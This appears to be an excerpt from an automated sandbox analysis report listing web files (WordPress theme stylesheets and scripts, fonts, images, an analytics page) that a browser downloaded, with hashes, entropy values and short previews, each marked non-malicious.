                                                                                                                                              Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5194
                                                                                                                                              Entropy (8bit):4.888431568408465
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:4eleEPg8gWB+MpsDCg1+gnyo+21cBNOGN0NZNwTZZ2NRui4WTqx/4itKJ:JJIlWB+MiDj1fnyo+21cBNO+/oP4g9
                                                                                                                                              MD5:0B9D5F8A48575D2D66AECFD926A75FC8
                                                                                                                                              SHA1:E902E07298C0A5D10953FDBF2A3F28F958DF3DC6
                                                                                                                                              SHA-256:E60815791C2F9CE7996354B7F1E23FFEDC49FD4D4EE1FC84051A9C1D81E3C35D
                                                                                                                                              SHA-512:8596B96EE65E40D567C35391F0C30108A85CD077D8C4852C601F19ADF4845EAA23E82BFDA43BD254A1CF7EB0D18FCBB269B270C10B24BA0A44F2CACF616E2F80
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/search/search.css?ver=6.0.9
                                                                                                                                              Preview:#top .avia_search_element form{. position: relative;. overflow: hidden;. clear: both;.}.#top .avia_search_element form div{. position: relative;. overflow: hidden;.}../* search form wrapper */..av_searchform_wrapper {. border-width: 1px;. border-style: solid;.}../* submit button wrapper */.#top .avia_search_element .av_searchsubmit_wrapper{. position: absolute;. right: 0;. height: 100%;. top: 0;. z-index: 2;. transition: all 0.2s ease-in;.}..#top .avia_search_element .av_searchsubmit_wrapper:hover {. opacity: 0.7;.}..#top .avia_search_element form.ajax_loading_now .av_searchsubmit_wrapper{. padding-right: 60px;.}..#top .avia_search_element form.ajax_loading_now .av_searchsubmit_wrapper.av-submit-hasicon{. padding-right: 0;.}..#top .avia_search_element .av_searchsubmit_wrapper .av-search-icon{. position: absolute;. left: 1em;. top: 50%;. height: auto;. transform: translateY(-50%);. z-index: 2;.}..#top .avia_search_element
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (583)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5498
                                                                                                                                              Entropy (8bit):5.847347848435852
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:kSsqdYuSji3KaTa1aOaiacarHZaXacaQj2X61av2HkF77wD8uOTe9:vsEYunOD1av2HjwuOk
                                                                                                                                              MD5:D2BB3AE594ACE88EF30EE3829D83F360
                                                                                                                                              SHA1:88FA158D7F7C72D86EFD52A5C16931A14C43E3F2
                                                                                                                                              SHA-256:481BE5E07D25ACC99546733A64F75D59AA6F347C2BC3CCC6233FCAF3EBFFBDFE
                                                                                                                                              SHA-512:0365D2DF7BED810ECA3059D5E7BBF784EDA7B6B88F5C0532BA1A7056F2FCD3C4447A4CBB0FAE818B12D32583916AC7DE8D9FF7DE4D53E5BCA7FCA6945F7DEDD9
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://mc.yandex.com/metrika/metrika_match.html
                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">. <meta name="viewport" content="width=device-width,initial-scale=1">. <style>body {background-color:#EFF2F7;font-family:system-ui,sans-serif;color:#2F3746;}.main{display:flex;flex-direction:column;align-items:center;}button {background-color:#7A45E5;border-radius:14px;cursor:pointer;color:white;border:0;padding:16px 20px;}button:hover {background-color:#8659e0;}h1{font-size:140px;white-space:nowrap;}h3{font-size:32px;text-align:center;}p{max-width:600px;line-height:24px;text-align:center;margin-bottom:32px;}@media (prefers-color-scheme: dark) {body {background-color:#333;color:white;}}@media (max-width: 650px) {h1 {font-size: 60px;}}</style>.</head>.<body>. <div class="main">. <h1 aria-hidden="true">.\_(.)_/.</h1>. <h3>Something
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65056)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):455558
                                                                                                                                              Entropy (8bit):5.248372640081929
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:ZwTZ1w61SAvkWDT36yo5prSeI0ITOZt4xGU/UlXt3:ZwTZ1w61SAvkWDT36yo5prSeI0ITYtaM
                                                                                                                                              MD5:1952123FE20CA00526EFAD380F94D508
                                                                                                                                              SHA1:6CCA19784C379920AC12F9E8B6ED1B66F0D7267C
                                                                                                                                              SHA-256:FBFECDAE8A45527030BD7EE6F647845C3364FF421D04D2FC54C1B1634D3D0ACE
                                                                                                                                              SHA-512:DBC1CF72C8C66A74AD3DA8860D9999D98B06C38F743052A2AB0848E3914BE728E719AE8C5E078F22ACAD1DAFA8C0635DE46643D1D6B0613B2106812D77494309
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.css
                                                                                                                                              Preview:@charset "UTF-8";@import url(https://fonts.googleapis.com/css?family=Open+Sans:400,600,700&display=swap);@import url(https://fonts.googleapis.com/css?family=Oswald:400,700&display=swap);@import url(https://fonts.googleapis.com/css?family=Roboto:400,700&display=swap);./*!. * Bootstrap v4.1.1 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol"}@-ms-viewport{width:device-width}body{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol}svg:not(:root){overflow:hidden}.row{display:-ms-flexbox;-ms-flex-wrap:wrap}.col{-ms-flex-preferred-size:0;-ms-flex-positive:1}.col-auto{-ms-flex:0 0 auto}.col-1{-ms-f
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (492)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):19050
                                                                                                                                              Entropy (8bit):5.200782294825635
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:9aLovuNOWbnMS7lfMl/1tBdBIjX8ALobnxl/L:9aL5NOYP7s1tBfUHmfj
                                                                                                                                              MD5:20D012E69255C68A1991E23BB63E28A9
                                                                                                                                              SHA1:0BF02ACA38F651D82E17BB799F5FB9468803BAF3
                                                                                                                                              SHA-256:651A1BF60B8F28C1B95C8048EB173868243E9E8BAA1AC573F5A65644678B3823
                                                                                                                                              SHA-512:49747092F01CECFB7E32D65C35643A7081F11AFCC1D0D6CD9CF405E407F240273ECAFF22283FE0A4F2E2967EC87D294DC36CCD202B8B86FD1266395AEC034CD1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/css/base.css?ver=4.5
                                                                                                                                              Preview:/* Table of Content.==================================================..#Reset & Basics..#Basic Styles..#Site Styles..#Typography..#Links..#Lists..#Images..#Buttons..#Forms..#Table..#Misc. #WordPress Generated Generics. #print styles.*/../* #Reset & Basics (Inspired by E. Meyers).================================================== */..html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video{...margin: 0;...padding: 0;...border: 0;...font-size: 100%;...font: inherit;...vertical-align: baseline; }..article, aside, details, figcaption, figure, footer, header
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:assembler source, ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):22078
                                                                                                                                              Entropy (8bit):4.962069640093992
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:HMeKcdKv4DXdf4nE8WNBWdnOiX+7URiBrqQNg3OoeUkKE7KziyjiIHa4lZfAJkL9:8cdryGr0qUMtsGWvf
                                                                                                                                              MD5:E161A370C369747D0D53850D89DA00D0
                                                                                                                                              SHA1:A2EC6A6D09693059E336F773882799440476C64B
                                                                                                                                              SHA-256:42C2AEEE58ABEFBE8E0E8C629C37D07E793C1D258D822BF77C4404F54E3A31DC
                                                                                                                                              SHA-512:9A693AEF2F523E15EC509ADCBC949BB6B73262D813184CEA6B2EFAB77082E371FC5408B63BE2D6A49DE55FF9A6103BE1C3CB9129BE6937805D52F234143CC0E6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/blog/blog.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.#Blog Styles.====================================================================================================================================================== */...template-blog .blog-meta{.float:left;.margin-right:50px;.}...multi-big .post_author_timeline , .single-small .post_author_timeline {.position: absolute;.top: 0;.left: 40px;.width: 1px;.height: 100%;.border-right-width:1px;.border-right-style: dashed;.}...single-post .post_author_timeline{.display:none;.}...sidebar_left .template-blog .blog-meta {.float: right;.margin-left: 50px;.margin-right: 0;.}...sidebar_left .multi-big .post_author_timeline , .sidebar_left .single-small .post_author_timeline {.left:auto;.right:40px;.}...sidebar_left .big-preview{.padding:0 131px 10px 0;.}..div .single-big .pagination{padding:1px 50px 10px 1px;}....sidebar_left .author-extra-border{
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (875)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3337
                                                                                                                                              Entropy (8bit):5.361120226462222
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:zZhBd+OKh0eZhrWxLEQv9wkjZji1j8ZL7jDJl/x:zD3X2TZhrWKmuk5iSt7jDDx
                                                                                                                                              MD5:38BFD2BF78B4F64A9A3746BCC8E75055
                                                                                                                                              SHA1:26F069056A8A54DDBCFEAC7386DC845B8EF6DEDB
                                                                                                                                              SHA-256:BF390AF928533178606C8803B2C1250E0E01B92AE051AFE34B52C629B1B733CC
                                                                                                                                              SHA-512:0CF1CDCC8EC8907EF74C013E63D38D60F76B31F17C525E88E48B61AF2DFFAEF668AF4DE2D502993FCC543221D476952ED5424CEED0931CFB774F2E318CA904E5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3J
                                                                                                                                              Preview:<!doctype html>.<html lang="en" translate="no">.<head>. <meta charset="utf-8">. <meta name='viewport'. content='width=device-width, initial-scale=1.0, maximum-scale=1.0,. user-scalable=1' >. <title>Servizio offerto da pienissimo.pro</title>. <meta name="google" content="notranslate">. <meta name="robots" content="noindex,nofollow">. <base href="/">. <link rel="icon" type="image/x-icon" href="favicon.ico">. datapicker boostrap -->. <link rel="stylesheet" href="https://unpkg.com/ngx-bootstrap/datepicker/bs-datepicker.css">.. fb e google analytics -->. <script>. !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?. n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;. n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;. t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,. document,'script','https://connect.facebook.net/en_US/fbevents.js');. (
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1848
                                                                                                                                              Entropy (8bit):4.724894714024008
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2dkKIhW0puBkkamo8oMOOMU3p7yU8GfZgQi5OW3qcP3GdhWQ70C+hW0trhW6cdWs:EkTMBjZdoMkE75iQijN+bt76lfBSJkS
                                                                                                                                              MD5:146901F0A263E01098AB0D0F146E47A5
                                                                                                                                              SHA1:6079F2CB25B97B9F7EE0D73355C3683AC12996F5
                                                                                                                                              SHA-256:E4A796EB71E0DAD51E33142B80AAAF859C496CCCF824E6396BA7653BB75C4E03
                                                                                                                                              SHA-512:94142747B7C433344F3FBAF5B32D51E41902B896D7288166155214DCA17844C9BF2E9FE83DC961785DA4213DD7771C5C51FEC5D96983C892A930B5BBB1049D5E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{ .."use strict";.. $(window).on('load', function (e) {...$('.avia-icongrid-flipbox').avia_sc_icongrid();. });....// -------------------------------------------------------------------------------------------..// Icongrid shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_icongrid = function(options)..{...return this.each(function()...{....var container = $(this),. icongrid_id = '#' + $(this).attr('id'),. methods;.. methods =....{.....buildIconGrid: function () {.. this.setMinHeight($(icongrid_id + ' li article'));. this.createFlipBackground($(icongrid_id + ' li'));.......},......setMinHeight: function (els) {.......if (els.length < 2) return;.......var elsHeights = new Array();......els.css('min-height', '0').each(function (i) {.......var current = $(this);.......var currentHeight = current.outerHeight(true)
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2106
                                                                                                                                              Entropy (8bit):5.089628914590677
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cL3B241lh+3bn3c3HCbmABEzEO31mzB3aswIzD77TNuw+lYD0JoKT:cL30O/qaZQkSPNJKYYGKT
                                                                                                                                              MD5:1576E8FB56FD21B095F1DAC17969D2B8
                                                                                                                                              SHA1:49A5726BA4EEA18651378C5C3DE530C6A9BF9688
                                                                                                                                              SHA-256:EFDD464E865BD091AC6944B9D999124C8E19FA28A23F25F55651BBDEA9A4BDA9
                                                                                                                                              SHA-512:56C1A18C78D63A935B06A4358B029D36D938C110F1EF822B723140E0987CE0B2D1135FFE22B54966D129DDD7A4AE0E5EDD95CCFA5928D5F5FBEE92A79A940FF7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/* ..this prevents dom flickering for elements hidden with js, needs to be outside of dom.ready event.also adds several extra classes for better browser support ..this is a separate file that needs to be loaded at the top of the page. other js functions are loaded before the closing body tag to make the site render faster.*/."use strict"..var avia_is_mobile = false;.if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) && 'ontouchstart' in document.documentElement).{..avia_is_mobile = true;..document.documentElement.className += ' avia_mobile ';.}.else.{..document.documentElement.className += ' avia_desktop ';.}.document.documentElement.className += ' js_active ';..(function(){..//set transform property. var prefix = ['-webkit-','-moz-', '-ms-', ""], transform = "";. for (var i in prefix). { . .// http://artsy.github.io/blog/2012/10/18/so-you-want-to-do-a-css3-3d-transform/. .if(prefix[i]+'transform' in document.documentElement.st
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 124 x 156, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):7879
                                                                                                                                              Entropy (8bit):7.948490500677716
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Y+P712lKFZObVtJcK4/Yhtkj2ihnj2lqHeZM4kNthMHB:Uld0UYZD+ZDkNjqB
                                                                                                                                              MD5:5C8AED765367D33266DB9F6F9851B171
                                                                                                                                              SHA1:7B64F52297E7720E4C1151B6C68496FC26985AA2
                                                                                                                                              SHA-256:2D2DB7745F05880F243117B05C91BA05911538833CE77C1BF7D7CB93CBE515D1
                                                                                                                                              SHA-512:FB90E0996558C1764697308967097481A06E14A4FEF906EABA6AFBB02ACDD49E66AC587A6366A93374C76183659C6EE0AAC7B160CA846C70C2E1A42628CEAF48
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...|..........Z.<....iCCPsRGB IEC61966-2.1..(.u..K.A....G...-,,.DAP..A...FA-b..6.yI.\<..$.....h..@[.Z..E.;.Z.F.9.."bf..o..3..3.T4....T..........B5n..5.....x...y...=v....5..j*...Qt#-<!<...m..nQ..e.3.nC.(|g....../..F(8..&aO..G...04ay9^-.Q..._R...f%...a.$.....1..~.e.......L~_>..U.Ud..b.B..i.E.HuUbLtUF.....}5c....u~.z....pmCn...,+w..Op.*.....[%.{...p~U..p....z...qg,.o.P.....],.........ao.:.|...d.g.k-......pHYs..=...=....t....IDATx..yt[..?..%..'v.MY a..J..R*...(...M.Y..0.SM.9..2.Li{JKK....J.i...6J).%@ .=.8$N...l..x.?....8.,.$s....Y.......r..w...... @....... @....... @....... @....... @....... @..Q...H..3.~..=................o..Q......3.8...J.J....&...{.@.y.0......@1"....f...../...~9..2.(X.....3.C...@3"..8j.;...y..h7.ND.y...#.{.g7.7.......2........_.....^GD.~X..|.......h......F..i.s...?....4......7.|#0.x..1.[.U.+........5...{....$....*.....v....z.4F9"......X......7..._.,@.....N..k3i0.q..D.y..2`90.I..$........%..<w!M....d.>.L.>.l.....Gx4.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (526)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):21453
                                                                                                                                              Entropy (8bit):5.067917996783254
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:p+7q2uR+rpRjFMMJk4ln24UOlbOFxLbfbRb4bubdRbaUbCPrbrmbfEbukbAb/QUp:4LeZnsdmF0Uqj5MLJ3Iqs1U4c/j5OG
                                                                                                                                              MD5:D662956158FCB5DE5F3AC6D37368B201
                                                                                                                                              SHA1:E654C4D0C69CA4D7366F963C378171643E6F380D
                                                                                                                                              SHA-256:4EE1EC83F28DBD83C9584415047F3848DE949A922DC4D0C2E15899B633FF7937
                                                                                                                                              SHA-512:66AE591B01BBA3F4691741071A082F230DFD218C45E3696B259F136E545981E54E3ADF56C7B423B60F907A6240D74F58AF70921E1C76657EA174793624065BBD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://unpkg.com/ngx-bootstrap@19.0.1/datepicker/bs-datepicker.css
                                                                                                                                              Preview:/* .bs-datepicker */..bs-datepicker {. display: flex;. align-items: stretch;. flex-flow: row wrap;. background: #fff;. box-shadow: 0 0 10px 0 #aaa;. position: relative;. z-index: 1;. /* button */. /* .bs-datepicker-head */. /* .bs-datepicker-body */. /* .current-timedate */. /* .bs-datepicker-multiple */. /* .bs-datepicker-btns */. /*.bs-datepicker-custom-range */. /* .bs-datepicker-predefined-btns */. /* .bs-datepicker-buttons */.}..bs-datepicker:after {. clear: both;. content: "";. display: block;.}..bs-datepicker bs-day-picker {. float: left;.}..bs-datepicker button:hover,..bs-datepicker button:focus,..bs-datepicker button:active,..bs-datepicker input:hover,..bs-datepicker input:focus,..bs-datepicker input:active, .bs-datepicker-btns button:hover, .bs-datepicker-btns button:focus, .bs-datepicker-btns button:active, .bs-datepicker-predefined-btns button:active, .bs-datepicker-predefined-btns button:focus {. outline: none;.}..bs-datepicker-head {. min-width: 270p
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1572)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):18042
                                                                                                                                              Entropy (8bit):5.340669711357762
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:aeKWbqXJfqJrbqGIwV4jcPYdeMoBqNDfqDrbqGIwV4paPG2e7HqqmUfqUrbqGIwG:1xlqY4C7jqY4JaqqY4j
                                                                                                                                              MD5:DEBBFBFF76DCE903F671F64462AB9223
                                                                                                                                              SHA1:A80B1567F8892DEAB6488CA30E728804F5FBC6AA
                                                                                                                                              SHA-256:8B23C40EB87B72D0152815CCDAE685F1381B9C282F2D582B1F3A1EDDFA5887DC
                                                                                                                                              SHA-512:6B1DB6A728879D35B525A8CF4ADA81B674AA295DFC98256ADAAC0F391F4AE2B6A9A916BC4B5E7C86377D74AE779B144C6070DA93BD6EEFEC99F7DB843817B34E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:"https://fonts.googleapis.com/css?family=Open+Sans:400,600,700&display=swap"
                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3671
                                                                                                                                              Entropy (8bit):4.94048523964413
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:4g+Y/NsWIQlE5s/WkaMSxlRvdMnisMBg66tcCdGGjQY5j6mSq:4gzsWDB/Ed7RvdMisM+6KEGU4gq
                                                                                                                                              MD5:81278637F1F5B5E4CE280E4DC50DF4C4
                                                                                                                                              SHA1:779CF7C899996009300063A7996B8326005BF784
                                                                                                                                              SHA-256:782FF525FA4D11046B9970A76B6C12A62C0AE9C6CABF0C55EA1735CD24104D50
                                                                                                                                              SHA-512:6356A62F4DA51A7E31FBCFD8A81E6B023443EEA284A7A723FA3390DA27A4E15736FD63B9C6B66E44BF793312EAA3D164996460FCE5F28D69814EAD45EF79DC36
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Magazine.====================================================================================================================================================== */...av-magazine{clear:both; overflow: hidden; margin-bottom:30px; -webkit-perspective: 1000px; -webkit-backface-visibility: hidden;}..av-magazine-group{clear:both; position: relative; overflow: hidden; }..av-magazine-group.av-hidden-mag{display:none;}..av-magazine-entry{clear:both; position: relative; margin-bottom: 10px;}..av-magazine-thumbnail{float:left; margin-right:15px; width:61px; min-height:61px; border:1px solid; padding:5px; display: block; text-align: center; position: relative;}..av-magazine-thumbnail-link{overflow: hidden; display: block;}..av-magazine-thumbnail img{ display:block; margin:0 auto; }..av-magazine .av-magazine-no-thumb .av-magazine-content-wrap{ mi
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1417
                                                                                                                                              Entropy (8bit):7.7706275313897875
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Viv6dalvho05f9I1gig+jG6PiU/JY6eLXQSiwPOoLbazXIZlLKuAPWtsBt2JHLzq:VivEa7o051ISeiUB7er/iw9azXgLpYC6
                                                                                                                                              MD5:62516D09C4FE66BD76DAAF35E1160199
                                                                                                                                              SHA1:A02F864EDC91B2AF3AFEFCEF2B422BE952659E14
                                                                                                                                              SHA-256:E69155C97C7718620DD76B32E1C722B8126349049936385B5CD8A484B40B2432
                                                                                                                                              SHA-512:4CEE2BC045452261824BBF2C820398BF6D9A64BE9566B08CBA639A658691C2AAD0DFFA57D8C52CA096EFD45CDCB106BBDACE1EA2FCA2E48113A568FA5CF50CB3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-32x32.png
                                                                                                                                              Preview:.PNG........IHDR... ... .....szz....PIDATX...k.U..?3.Iws.6..&.........6. ]..,..*B..._].._.._...E....C.%EQ...Uk.....f.to.;>..t:......r...}.............I ....@.H..@.....7.<..[.....si..<`....@.p....Ek@..'.....k......T.k.#.....I....lg2.p;.........o.y...6./._.s.!.v..Bf.....`.(..|.m...........v.X.s.8+#....k..E....+....|........"......[.~.......{.+@..x..E.Z..P.........,...L.\$.......W....#..J.%....W...oE..&......\...t..$.L.s.V.....\n.].XX.>/..e;.s.K...:`..Cj.owH'...u..........Rd.s.ax.p............'5.43..,=...I.y.V.`.(..9.h.......;eeB>.....f-<..R..Nb@.....d..e....W..k.x...D{.W..;......8'....&."iV .tM.J...~.eMrv[_..0=..V....N....%..[*?..N......G.Z8.c........T.0S....kW'.k3Si<....{...[..R.|..=.-.O...L.2<V..@ .....,.k.c..Z.......bg."..-....9....>.^......w..l&..^..._..G...U.r.F.|F .rAJ1~E....O.g..4f.`g3....M..<.r...l..|.|.....E..|!0.%...p..R.5*A...<.....?+.....h.......E...p.....s....z.h.N]a....7&.v...U..R..1.....B.....@...wN..B.~-..J...s.........76....T..7
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 26840, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):26840
                                                                                                                                              Entropy (8bit):7.993292152225703
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:768:4jQTVz/f7Kly/97IqMVvuuuwXuh+ffks76H2/N2FM:UQZ/fulyFI5j8gffh76H2/N2FM
                                                                                                                                              MD5:BD69E2AEC85D6EC6BD301351CC4D9929
                                                                                                                                              SHA1:ED6CA540B0672F67BED97C9A3A8BDED24742FBC5
                                                                                                                                              SHA-256:70D2317361D4D7DFC3A23926FF2731627248C7E93C85D9B043C1B6047B2E3225
                                                                                                                                              SHA-512:CF460FBB1778358038F97513C8B9FDDF7A97FCDFBF62FCB6F7756CB4E3BC5F32C1FE48E46BBD6D04122F3A4C33911D134388A2C07AB42BDD2E4CA5EFDAE61BF1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.gstatic.com/s/terminaldosis/v20/BXRyvFbejejHgENDQMs-nhycKtDQ9Zg.woff2
